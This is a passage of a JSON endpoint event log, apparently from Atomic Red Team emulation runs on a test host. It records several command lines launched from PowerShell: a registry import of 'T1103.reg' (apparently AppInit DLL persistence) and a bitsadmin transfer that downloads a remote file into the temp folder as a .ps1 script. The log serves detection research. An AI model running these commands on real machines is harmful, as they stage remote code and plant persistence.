"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871520000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.Wrapper.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.Wrapper.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": 
"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "image_load", - "image_name": "System.EnterpriseServices.Wrapper.dll", - "image_path": "C:\\Windows\\Microsoft.NET\\assembly\\GAC_32\\System.EnterpriseServices\\v4.0_4.0.0.0__b03f5f7f11d50a3a\\System.EnterpriseServices.Wrapper.dll", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "timestamp": 131883570871360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - 
"process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570871680000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "process", - "pid": 1976, - "process_name": "RegSvcs.exe", - "process_path": "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegSvcs.exe", - "subtype": "terminate", - "timestamp": 131883570871990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-001049794D01}" - }, - { - "event_type": "file", - "file_name": "REGASM.EXE-8A092F8F.pf", - "file_path": "C:\\Windows\\Prefetch\\REGASM.EXE-8A092F8F.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": 
"c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570872770000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "CSC.EXE-F7BE4369.pf", - "file_path": "C:\\Windows\\Prefetch\\CSC.EXE-F7BE4369.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570872770000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "REGSVCS.EXE-ED64D53D.pf", - "file_path": "C:\\Windows\\Prefetch\\REGSVCS.EXE-ED64D53D.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883570872770000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg.exe import T1103.reg\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 6964, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570874900000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, 
- "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570874800000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "command_line": "reg.exe import T1103.reg", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1784, - "ppid": 6964, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "create", - "timestamp": 131883570874990000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}", - "unique_ppid": "{42FC7E13-CADF-5C05-0000-00109C984D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "reg.exe", - "image_path": "C:\\Windows\\System32\\reg.exe", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - 
"pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "advapi32.dll", - "image_path": "C:\\Windows\\System32\\advapi32.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 
131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "image_load", - "image_name": "ws2_32.dll", - "image_path": "C:\\Windows\\System32\\ws2_32.dll", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "process", - "pid": 1784, - "process_name": "reg.exe", - "process_path": "C:\\Windows\\System32\\reg.exe", - "subtype": "terminate", - "timestamp": 131883570874960000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010A3994D01}" - }, - { - "event_type": "process", - "pid": 6964, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00109C984D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 8152, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570875160000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "event_type": "process", - "pid": 8152, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883570875110000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-00100B9B4D01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %%TEMP%%\\bitsadmin_flag.ps1\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 2108, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883570876240000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}", - "unique_ppid": 
"{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 2108, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}" - }, - { - "command_line": "bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md C:\\Users\\bob\\AppData\\Local\\Temp\\bitsadmin_flag.ps1", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - 
"parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5868, - "ppid": 2108, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "subtype": "create", - "timestamp": 131883570876330000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}", - "unique_ppid": "{42FC7E13-CADF-5C05-0000-0010C9A24D01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - 
"timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": "C:\\Windows\\System32\\ucrtbase.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "combase.dll", - "image_path": "C:\\Windows\\System32\\combase.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "rpcrt4.dll", - "image_path": "C:\\Windows\\System32\\rpcrt4.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "bcryptprimitives.dll", - "image_path": 
"C:\\Windows\\System32\\bcryptprimitives.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "bitsadmin.exe", - "image_path": "C:\\Windows\\System32\\bitsadmin.exe", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876210000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "sechost.dll", - "image_path": "C:\\Windows\\System32\\sechost.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "image_load", - "image_name": "sspicli.dll", - "image_path": "C:\\Windows\\System32\\sspicli.dll", - "pid": 5868, - "process_name": "bitsadmin.exe", - "process_path": "C:\\Windows\\System32\\bitsadmin.exe", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010BFA34D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570876360000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 
